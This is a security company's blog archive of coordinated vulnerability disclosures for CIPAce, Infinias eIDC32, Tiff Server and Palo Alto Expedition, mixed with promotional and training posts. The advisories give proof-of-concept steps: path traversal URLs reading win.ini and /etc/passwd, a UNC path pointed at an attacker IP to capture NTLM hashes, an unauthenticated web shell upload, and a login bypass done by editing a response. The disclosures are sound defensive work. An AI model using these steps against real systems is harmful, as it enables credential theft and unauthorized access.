Category: blog

Versions Tested:
CIPAce Version < 6.80 Build 2016031401
CIPAce Version < 9.1 Build 2019092801

Product:
https://www.cipplanner.com/Products/CIPAce/Pages/CPMPlatform.aspx

Security Advisories:
N/A

CVE Numbers:

• CVE-2020-11586
• CVE-2020-11587
• CVE-2020-11588
• CVE-2020-11589
• CVE-2020-11590
• CVE-2020-11591
• CVE-2020-11592
• CVE-2020-11593
• CVE-2020-11594
• CVE-2020-11595
• CVE-2020-11596
• CVE-2020-11597
• CVE-2020-11598
• CVE-2020-11599

CyberOne‘s TEAMARES researchers have released a steady cadence of advice regarding the importance of testing your systems regularly for vulnerabilities. The following vulnerabilities uncovered during an external penetration test drives home this necessity.

While conducting an external penetration test, our team noticed something very strange: a web application called CIPAce was disclosing errors. Under normal circumstances, this wouldn’t be unusual, but the way the application was handling errors coupled with the fact that full-stack traces were shown meant that the web.config file was configured incorrectly.

Typically, a red teamer would blindly attack this application if it could not be downloaded from an open-source repository or as a trial version. However, we decided to ask our client directly for the entire application source code as it was unavailable for download anywhere. Although these types of requests are ordinarily refused, our client was more than happy to share the source code with the team.

With the source code in hand and Jet Brains dotPeak .NET decompiler downloaded, we promptly delved into the application only to find a whopping 15 zero-days! This is a great example of why providing your source code to red teamers can help us fully flush out bugs and investigate vulnerabilities that pose a greater risk.

Technical Details:
Upon receiving code for the version 6.80 Build 2016031401 of the CIPAce application, we were not aware of a newer version. However, while going through the source code and APIs, we noticed an API named GetDistributedPOP3 that returned the username and password of the SMTP user.

Figure 1: API Request obtaining SMTP Password

We quickly emailed the client to inform them of this bizarre “feature” and heard that there was a newer version available for review. This vulnerability did not exist in version 9.1 of the CIPAce application; however, we discovered this was just the tip of the iceberg.

The client provided us the source code for version 9.1 Build 2019092801. Since the first “feature” that leaked sensitive data was an API, we dug further and found a ton of other SOAP calls that leaked internal data, including hostname, folder/file paths, and database structures. The one that stood out the most was a SOAP API call that exposed all contents of the user table within the database, thus making SQL Injection unnecessary as we had everything we needed to login to the application with the highest user permissions. On a positive note, the passwords were MD5 hashed.

Figure 2: API Request Leaking Username and Password Data

Lastly, the most impactful vulnerability that we discovered during our penetration test was a neat file called “Upload.ashx”. After a quick review, our team observed that it lacked the necessary code to put it behind authentication and allowed the upload of any ASHX file to the underlying file system. With that in mind, we quickly drafted a multipart/form-data POST request to upload a web shell. At this time, the client locked down the application to only be accessible to our IP so we were not concerned about uploading a web shell that did not require authentication.

Figure 3: Uploading ASHX web shell

Figure 4: Executing commands through uploaded web shell

Additional Vulnerabilities:
These are just a few of the many vulnerabilities existing today with the following table outlining some additional vulnerabilities. It’s important to note that all of these issues are exploitable without authentication, which underscores the necessity of thoroughly reviewing applications to prevent bugs – especially applications that are marketed to government agencies and major corporations.

Timeline:
11/13/2019 – Discovered POP3 Password Disclosure Issue
11/14/2019 – Confirmed the POP3 Password Disclosure was fixed on version 9.1
11/17/2019 – Discovered other 14 0-days in application version 9.1
11/17/2019 – First communication sent to vendor / No Response
11/19/2019 – Second communication sent to vendor / No Response
11/25/2019 – Third communication sent to the vendor
11/26/2019 – Vendor responded via phone call and stated they are working with the client to get it fixed
01/23/2020 – Confirmed all but one information disclosure issue was fixed
03/19/2020 – Confirmed that the last information disclosure item was fixed
03/24/2020 – Requested CVEs

Credit:
Discovered by Quentin (paragonsec) Rhoads-Herrera, Director of Professional Services at CyberOne

Our Team:
CyberOne’s TEAMARES is comprised of professionals with more than a decade of experience conducting offensive and defensive security services. Our team has expertise in a wide array of industries, including oil and gas, healthcare, app development firms, hospitality, technology, and more.

Follow us on Twitter @TeamAresSec to stay up to date on vulnerability discoveries and cybersecurity news.

Due to current events, your organization is more than likely experiencing disruption resulting from a rush to implement remote work policies, social distancing, and other unexpected changes to business as usual.

And if you’re like many organizations, chances are you did not have remote work contingency plans in place and may be scrambling to find the right tools to ensure your security programs continue uninterrupted.

Whether you’re a VAR or managing an internal team, your red team can still function remotely with offensive security testing tools that leverage open-source technology. Remote and open-source teams can help keep security in place with no gaps.

TEAMARES‘s Director of Professional Services, Quentin Rhoads-Herrera, and partner Telesploit’s chief consultant, Wirefall, encourage you to explore the open-source version of Telesploit on GitHub.

Telesploit was designed by and for penetration testers. It creates a simple solution for performing internal penetration tests remotely. In this blog, Quentin and Wirefall share the key benefits of deploying a remote internal penetration testing solution, which includes:

• Reduced travel costs. Travel can be a significant factor in the overall cost of doing business for internal security testing. If you’re seeking to reduce expenses associated with 3rd party assessments, organizations that don’t have a remote offering will find themselves at a disadvantage.
• Increased utilization. While reducing travel time can have a positive effect on overall utilization, being able to leverage a single resource across multiple concurrent engagements significantly enhances utilization.
• Maximized onsite productivity. All initial reconnaissance can be completed prior to arrival. If a new vulnerability or unfamiliar target is identified during the discovery phase then attacks can be staged and tuned in a lab environment well in advance of deployment within the client environment. The penetration tester will be ready for exploitation on Day 1.
• Become more flexible. Leverage your resources wherever they’re located, whether it’s Boise, Boston, or Bengaluru.
• Provide new services. Open source can allow for novel approaches to penetration testing that weren’t economically feasible before, such as “low and slow” attacker simulation, blue team training, and more convenient retesting.
• Decreased employee burnout. Eliminate unnecessary travel to help keep your talent from moving on.
• Increased employee health and safety. A sound work from home policy, even under normal circumstances, can keep employees productive without exposing them to colleagues who may be sick.

Follow us at @TeamAresSec to stay up to date.

If you need help implementing remote penetration testing tools, talk to a TEAMARES team member or reach out to Telesploit at info@telesploit.com today for assistance. We want to keep you working!

Versions Tested:
Web Revision: 1.107, Board: 3.001, Firmware: 2.213

Product:
https://www.3xlogic.com/products/access-control/infinias-ethernet-enabled-integrated-door-controller-eidc

Security Advisories:
N/A

CVE Numbers:
CVE-2020-11542

CVSS Score:
N/A

CWE:
CWE-305: Authentication Bypass by Primary Weakness

NIST:
IA-4: Identifier Management

OWASP:
A2: Broken Authentication

With access to a system’s control interface, a malicious actor can unlock controls remotely, allowing them to gain physical entry to restricted areas. However, lessons learned from other breaches can help everyone better understand how to prevent unwanted access.

During an internal penetration test, our team discovered a physical access control system from Infinias on the target network. As luck would have it, the device was still configured with default credentials, which allowed us to log in and look around. After briefly browsing the manufacturer’s site and reading their documentation, it became clear that this could be an interesting target as the Infinias eIDC is a PoE-enabled door controller that allows one or more physical access control systems to be integrated into a network for ease of management. It was interesting to find a device configured to still accept default credentials. However, we did notice something else that was strange. When reviewing HTTP logs in Burp Suite, the string “CMD” was found in a number of requests. That sounded juicy, so we did what red teamers do and started chasing the white rabbit down a hole.

We discovered that the Infinias eIDC32 WebServer has an exploitable authentication bypass vulnerability due to unsecure authentication methods handled on the client-side JavaScript. This would have been more difficult to identify without a set of valid credentials, whether default or not. However, with physical access to IoT devices like these, the firmware can be pulled off and analyzed to take an even deeper dive.

Technical Details:

Greeted with the device’s web interface we were able to log in using default credentials found within their documentation.

While watching the traffic in Burp Suite, this little gem stood out immediately.

When intercepted, this is the HTTP Response to the request with valid credentials:

At this point, we decided to take a look at the source code to see how the authentication was being handled. A quick search for the string “LGI” returned the following bit of vulnerable code:

This section simply hex encodes the username/password and adds a “00” between the two encoded values. The next step was to start digging in to see the differences between valid and invalid credentials. Submitting another authentication request with invalid credentials (UN:AAAA PW:AAAA) confirmed this.

Comparing the HTTP responses of invalid and valid credentials, the difference becomes clear. The HTTP response to the successful login contains the string “<KEY>MYKEY</KEY>” in the XML body data, whereas the failed login does not.

Using Burp Suite, we intercepted the eIDC32 WebServer’s response to our login attempt using invalid credentials. From there, we added the string “<KEY>MYKEY</KEY>” to the XML body data to match the successful login response and forwarded the response.

Changing this value in the HTTP response bypasses the client-side JavaScript controls,  allowing an attacker with invalid credentials to bypass the login process of the device and access it as an administrative user.

Lessons learned
While central management of networked access control systems can be a huge convenience, it is important to ensure that the systems are configured properly, kept updated, and to disable/change any default accounts to prevent malicious activity.

Timeline:
3/20/2019 – First communication sent to the vendor
3/22/2019 – Technical Support replies saying it will be sent to the “access team” for review
3/25/2019 – Response from a second technical support employee:

“What vulnerability are you speaking of? We do get flagged on occasion for different things. To my knowledge, most or all have a workaround”

3/25/2019 – Back and forth discussing finding, submitted PDF with additional details, no response.
4/8/2019 – Still no response, I reached back out to no avail.
9/30/2019 – The client met with a rep from Stanley Security, 3XLogic’s parent company, and connected us. All info including the write-up and previous emails were sent to Stanley Security.
2/27/2020 – No response still
3/12/2020 – Submitted for CVE

Credit:
Discovered by the following Security Researchers for TEAMARES at CyberOne
Quentin Rhoads-Herrera, Director of Professional Services – @paragonsec
Cory Mathews, Offensive Security Manager – @M3chSec
Chase Dardaman, Senior Adversarial Engineer – @CharlesDardaman

New course offered at BlackHat 2020:

To help sharpen the skills of penetration testers and threat hunting teams, TEAMARES will be offering an onsite training course at BlackHat USA 2020 in “Adversary Emulation and Active Defense.”  This course will provide information security concepts utilized in both offense and defense. Attendees will learn skills that can be applied to increase capability from both sides including exploitation, circumventing defenses and lateral movement from an attacker’s perspective. The course will also cover key techniques for detection, threat hunting and mitigation to counter an attacker’s toolbox.

Follow us on Twitter @TeamAresSec to stay up to date on vulnerability discoveries and cybersecurity news.

With the daily routines of millions rapidly changing as we settle into a period of social distancing, many are looking for ways to pass the time once their reading lists have been plowed through and the Netflix binge is no longer do the trick. Why not take advantage of this downtime to learn a new skill or brush up on your knowledge with a few refresher courses?

CyberOne‘s TEAMARES has compiled a list of the best online security training course currently on the market – both free and paid. Here are some to consider:

Paid Courses:

Offensive Security:

• OSCP provides solid entry-level certification that will teach you how to think like an attacker. This is the one you need to land a job in penetration testing if you have no experience.
• OSCE is a good entry point to learning stack-based exploit development.

ElearningSecurity:

• Penetration Testing Student is a good entry point to learn the tools and techniques.
• Web Application Penetration Testing covers mostly web app basics with good labs.
• Web Application Penetration Testing Extreme is a practical online course on the most advanced web application penetration testing techniques.
• Penetration Testing Extreme focuses on social engineering/phishing, Active Directory, red teaming MSSQL Server, red teaming Exchange, red teaming WSUS.
• Mobile Application Security and Penetration Testing covers mobile app basics.

Hack the Box – Offshore & Rasta Labs

• Inexpensive lab environments – NOT courses – with hands-on practical’s that cover everything from open-source intelligence gathering to exploit development. Commonly touted as a great practice area for certification courses, such as the OSCP.

Nathan House Security Courses:

• The Complete Cybersecurity Course: Hackers Exposed covers advanced practical skill sets in defeating all online threats – advanced hackers, trackers, malware and all types of Internet nastiness, including mitigating government spying and mass surveillance with the very latest up-to-date information and methods.
• The Complete Cybersecurity Course: Network Security is an advanced practical skillset in assuring network security against all threats including – advanced hackers, trackers, exploit kits, Wi-Fi attacks and much more.
• The Complete Cybersecurity Course: Endpoint Protection offers advanced practical skill sets in securing laptops, desktops and mobile devices.
• The Complete Cybersecurity Course: Anonymous Browsing with advice on how to stay anonymous online, how to maintain privacy and how to bypass firewalls and proxies.

Free Courses:

• Azeria Labs to learn ARM32 bit exploit development.
• Ruben Boonen with a lot of great tutorials around Windows security and penetration testing.
• Corelan Team offers a series on learning exploit development.
• Malware Unicorn is a great resource on malware reverse engineering and includes a VM.
• Hack the Box has free resources along with paid that can be used to get hands-on practice.
• VulnHub contains a resource of vulnerable by-design boxes that users can practice on.
• EdX offers a series of courses ranging from intro to python programming to Linux and beyond.
• Coursera contains over 1,000 free courses that can be used to further your IT experience.
• Cybrary contains tons of free IT classes and videos.
• Google LearnDigital with Google contains many courses for learning
• Portswigger contains many free labs to practice web application penetration testing.

Challenging times bring out the best in people – but also the worst. As the world deals with COVID-19 and the economic fallout, you can be sure that scammers are looking for ways to capitalize on this crisis. Among their methods includes leveraging current events and news.

“Every year we see tax refund season create a spike in scams targeting people in an effort to steal their money. The same will likely hold true now as we expect to see an uptick in scammers taking advantage of the current COVID-19 pandemic with phishing (Email), vishing (Voice), or smishing (SMS) attacks,” said Quentin Rhoads-Herrera, director of professional services and TEAMARES at CyberOne. “We’re anticipating a spike in online financial scams as the federal government works to stimulate the economy. Ideas such as sending checks to Americans ‘immediately’ to help cushion the economic impact of the coronavirus outbreak will surely open the door for online financial scams.”

Being proactive is key in safeguarding your business, as well as keeping the following in mind:

• Be on high alert. Scams come in all flavors. The safest bet is to always direct questions, comments, or concerns directly to the source, be it the IRS, your bank, vendors, partners, customers – anyone.
• Always question offers of unsolicited financial assistance. Go directly to trusted sources instead of blindly trusting emails, phone calls, or even text messages.
• Be proactive – prepare for breaches by ensuring you have a game plan in place. Whether it’s taking advantage of incident retainer services or dusting off your business continuity plan, work to stay ahead of cybercriminals.

Follow us at @TeamAresSec to stay up to date as the situation evolves.

What does a computer virus have in common with the Coronavirus (COVID-19)? Plenty, believe it or not, as technology can be used to help solve both.

The TEAMARES research team has found that our hash cracker Cthulhu can be used to run computer simulations that mimic the same complex protein folding that occurs in viruses. We’re sharing our findings with Folding@Home to simulate how the virus behaves – data that we hope can be used by doctors and healthcare professionals to develop potential vaccines.

Folding@Home is a project established to assist researchers around the world to take up the fight against COVID-19. It leverages complex algorithms to simulate protein folding in order to examine diseases such as COVID-19. This project allows people with laptops or even complex GPU machines to provide computing power to help provide those protein folding simulations.

Similar to cryptocurrency mining, people who are not medical experts are able to leverage their own expertise to help solve global issues such as COVID-19. With the help of Cthulhu, TEAMARES has been processing jobs straight from Folding@Home on our CPU and GPU processing power. Folding@Home then takes that data to help in researching viruses.

We’re hoping our participation in this project will help medical professionals across the globe find a cure. For more information, visit foldingathome.org, and be sure to follow us on Twitter @TeamAresSec to stay up to date as the situation unfolds.

Versions Tested:

Tiff Server 4.0

Product:

https://www.aquaforest.com/en/tiffserver.asp

Security Advisories:

N/A

CVE Numbers:

CVE-2020-9323

CVE-2020-9324

CVE-2020-9325

CVSS Score:

• Unauthenticated File and Directory Enumeration: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N/E:P/RL:W/RC:C
• Unauthenticated Arbitrary File Download: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:W/RC:C
• Unauthenticated SMB Hash Capture via UNC: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:W/RC:C

CWE:

• Unauthenticated File and Directory Enumeration: CWE-22: Improper Limitation of a Pathname to a Restricted Directory (“Path Traversal”)
• Unauthenticated Arbitrary File Download: CWE-20: Improper Input Validation
• Unauthenticated SMB Hash Capture via UNC: CWE-522: Insufficiently Protected Credentials

NIST:

• Unauthenticated File and Directory Enumeration: AC-3: Access Enforcement
• Unauthenticated Arbitrary File Download: SI-10: Information Input Validation
• Unauthenticated SMB Hash Capture via UNC: SC-28: Protection of Information at Rest

OWASP:

• Unauthenticated File and Directory Enumeration: A5 Broken Access Control
• Unauthenticated Arbitrary File Download: A1: Injection
• Unauthenticated SMB Hash Capture via UNC: A3: Sensitive Data Exposure

Summary:

The product Tiff Server 4.0 from AquaForest is vulnerable to the following:

• Unauthenticated File and Directory Enumeration
• Unauthenticated Arbitrary File Download
• Unauthenticated SMB Hash Capture via UNC

Of the three vulnerabilities discovered in the Tiff Server product, only the arbitrary file download issue has been confirmed as fixed. The vendor stated that the fix for the SMB hash capturing and the file and directory enumerations are not planned to receive a patch. As of October 10th, 2019, the vendor’s stance on these issues was:

“Tiff Server is not intended for use on a public website (we advise against using it in this way) & also clients should be able to apply their own security if they have concerns”

TEAMARES advises that users of the product update and block SMB access to servers other than those needed for this application to operate correctly. The application should also be placed behind a WAF or not exposed to external sources if possible.

Vulnerability – Unauthenticated File and Directory Enumeration:

The framework TIFF Server from https://www.aquaforest.com/en/tiffserver.asp allows users to make unauthenticated GET requests to: https://www.<host>/tiffserver/tssp.aspx?FN=C:Windowswin.ini&PC=Y.

This will prompt a message if a file is real, a directory is real, and if directory files exist. This is limited information, but should still not be allowed to be made unauthenticated.

To reproduce:

In order to replicate the vulnerability, all a user has to do is make a GET request to: https://www.<host>/tiffserver/tssp.aspx?FN=. File paths are passed in the URL as the variable “FN”.

First, we show a fake file being passed to the “FN” variable and the message showing “afPageCount=0”.

Next, we show a real file being passed and we see the message returned is drastically different.

Finally, we show a directory being passed and the number of files being shown in the response.

Vulnerability – Unauthenticated Arbitrary File Download:

The framework TIFF Server from https://www.aquaforest.com/en/tiffserver.asp suffers from an unauthenticated local file inclusion vulnerability that allows malicious users to download any file from the webserver.

The vulnerability can be triggered via the download.aspx file: https://www.<host>/tiffserver/download.aspx

This was found by downloading a 14-day trial of the software and analyzing the code. Since it is written in .NET, we can use a tool called DotPeek (https://www.jetbrains.com/decompiler/) to decompile the DLL’s to its source. The code shown below does not check authentication, nor does it sanitize the filename that is passed.

To Reproduce:

In order to replicate the vulnerability, a user must simply navigate to the URL and supply a filename in the “filename” variable as shown below.

https://www.<host>/tiffserver/download.aspx?name=C:Windowswin.ini

Vulnerability – Unauthenticated SMB Hash Capture via UNC:

The framework TIFF Server from https://www.aquaforest.com/en/tiffserver.asp allows a user to pass a UNC path to multiple variables on the application, which then allows malicious users to capture the Window users Net-NTLMv2 password hash without any authentication. This vulnerability was discovered by reading the documentation available for this software.

To Reproduce:

To replicate the vulnerability, a user would only need to set up a listener for the SMB traffic. In our case, we used Metasploit’s auxiliary SMB Capture module and modified our firewall in order to port SMB traffic to our attacking box.

Next, you can navigate to one of the two URLs unauthenticated and replace our attacker IP with yours.

• https://www.<host>/tiffserver/tiffserverclassic.aspx?at_path=\<attacker ip>test
• https://www.<host>/tiffserver/tiffpilot.exe?FN=\<attacker ip>test

That resulted in us receiving the Net-NTLMv2 hash for the app user, which is a critical issue since it is both unauthenticated and external.

Timeline:

09/12/2019 – Discovered Issue
09/12/2019 – First communication sent to vendor / No Response
09/30/2019 – Second communication sent to vendor / No Response
10/03/2019 – Third communication sent to vendor
10/03/2019 – Vendor responded
10/04/2019 – Reports sent to the vendor
10/09/2019 – Vendor confirmed Unauthenticated Arbitrary File Download to be fixed
10/10/2019 – Vendor confirmed Unauthenticated Arbitrary File Download fix will be released but stated they would not fix the other two issues
02/20/2020 – Obtained CVEs
02/26/2020 – Released publicly

Credit:

Discovered by Quentin (paragonsec) Rhoads-Herrera, Director of Professional Services for TEAMARES at CyberOne.

New course offered at BlackHat 2020:

To help sharpen the skills of penetration testers and threat hunting teams, TEAMARES will be offering an onsite training course at BlackHat USA 2020 in “Adversary Emulation and Active Defense.”  This course will provide information security concepts utilized in both offense and defense. Attendees will learn skills that can be applied to increase capability from both sides including exploitation, circumventing defenses and lateral movement from an attacker’s perspective. The course will also cover key techniques for detection, threat hunting and mitigation to counter an attacker’s toolbox.

Follow us on Twitter @TeamAresSec and @paragonsec to stay up to date

No matter how much you think you’ve done to protect your data and systems, common vulnerabilities continue to wreak havoc on enterprises. Cyberattacks are already increasing due to global events, meaning it’s more important than ever to identify and secure vulnerabilities.

The following are some vulnerability trends the TEAMARES team is seeing – and what you can do to protect your organization.

Problems with Patch manager and Secure Coding Practices

Externally facing assets, which should be considered one of the highest risk assets, tend to have a problem with Patch manager and secure coding. Custom applications are being developed without sanitization, which leads to some of the more severe vulnerabilities that allow us to access systems and your internal network. From an external perspective, Patch management following secure coding is important as most vulnerabilities stem from those.

Weak passwords

Weak passwords continue to be an issue. We often find that the fastest way to domain admin isn’t some novel zero-day exploit that leads to some very critical finding across the world. It’s literally guessing a password, logging as that domain admin, and then us gaining a foothold and control over the entire infrastructure. A few recent examples include our team finding passwords that were four characters long belonging to domain admins. We’ve also found eight-character passwords that are service accounts that haven’t been changed in over five years, which can lead to some severe consequences to a corporation.

The best way to tackle weak passwords is to rotate passwords, make them complex and leverage multifactor authentication. Make it difficult for the average script kiddy or novice hackers to gain access to your network or gain control of your network. You can easily accomplish this by ensuring password complexity. In addition, placing critical accounts such as domain admins in Active Directory groups that are protected could prevent those passwords from being stored in Windows memory, elevating the skills needed to capture those credentials.

Orphaned machines

Orphaned machines are causing organizations numerous headaches. These are machines that have fallen out of date and/or out of asset management systems, that are still on the network and may contain sensitive passwords or source code. We often find that these machines are still vulnerable to EternalBlue or even older vulnerabilities. TEAMARES has found that they can exploit these and gain domain admin since the password was left behind as an artifact on the machine, which poses a severe risk for an enterprise.

We strongly encourage companies to scan their networks, not just for the machines in your asset inventory, but also for machines that could potentially be within that subdomain or that netblock.

Lack of security monitoring or detection

We’re also finding a lack of security monitoring or detection as companies aren’t installing or utilizing their security tools appropriately, making them easy to bypass.

If you have defensive technologies in place, it’s imperative that your security team is trained to use those tools. Our team frequently finds tools in place but they’re not being monitored. The result is that alerts are going undetected. Employees need to be empowered to follow up on these alerts to stop attackers and dwell time.

When we conduct pen testing for clients, we want to highlight in our reports the positives, what we were being detected doing. However, we often find that we’re not detected doing some of the most common and basic exploits or techniques that are known to the field, like using Responder to poison requests or password spreading across whole subnets. Techniques like these should be caught quickly, alerted on and followed up on by your security defensive teams.

Given some of the low-hanging fruit or common issues, our goal is to educate the market about common issues. We can work together to patch, fix and close issues, making it more complex for attackers to hack your network, own your subdomain and impact your users and customers.

Check back each month for the latest vulnerabilities being seen by our team as a guide to help protect your systems.

by Quentin Rhoads-Herrera | Director of Professional Services, CyberOne

January 15, 2020

Background:

During a recent penetration test for a client, I came across a tool called MigrationTool from Palo Alto Networks. The tool was littered with issues, like the unauthenticated disclosure of passwords, hashes, versions, and more that were uncovered.

So, what’s a TEAMARES team member to do? I quickly grabbed my screenshots and informed Palo Alto Networks of the chaos I uncovered. To my dismay, Palo Alto set me straight and told me they no longer support this product — they, instead, revamped it into a tool called Expedition. They did, however, give me some news that sparked some happiness; Palo Alto Networks’ PSIRT team encouraged me to look at Expedition for any similar issues! A company that wants their products actively tested? The game was on at that point!

Versions Tested:
1.0.106

CVE Numbers:
CVE-2018-10142

Security Advisories:
PAN-SA-2018-0016 – https://securityadvisories.paloaltonetworks.com/Home/Detail/135

Issue:

Luckily Expedition is free and comes in a VM which makes researching it straightforward. My goal was to identify the same issues that existed within MigrationTool, but that goal was quickly squashed. It was very apparent that Palo Alto Networks made some serious changes. A shout out to Palo Alto Networks commitment to quality.

After searching through the web code that required no authentication in order to access, I came across a file named checkPidStatus.php.

After looking at the code, it appeared its main function was to check the existence of a running process by doing the following:

• Ingest an HTTP GET request with the variable pid
• Pass the variable pid to a function which checks whether the specific process is running and return the result true or false.

However, the way the code checked for the running processes was to use the function file_exists and check in the /proc/ directory. Due to the lack of input sanitization, this allowed any unauthenticated user to use path traversal and check the existence of any file on the file system.

Proof of Concept:

As an unauthenticated user, send an HTTP GET request to http://<IP>/API/process/checkPidStatus.php with the variable pid in the body of the request. Replace the pid value with a path traversal payload such as /../etc/passwd. If the file exists, the response will return with isRunning: true.

Timeline:

2018-10-17 – Vendor Disclosure

2018-10-17 – Vendor Responded Confirming the Vulnerability

2018-11-20 – Vendor Informed Vulnerability Has Been Fixed and Issued CVE-2018-10142

2018-12-03 – Public Release

by Quentin (Paragonsec) Rhoads-Herrera | TEAMARES
November 29, 2018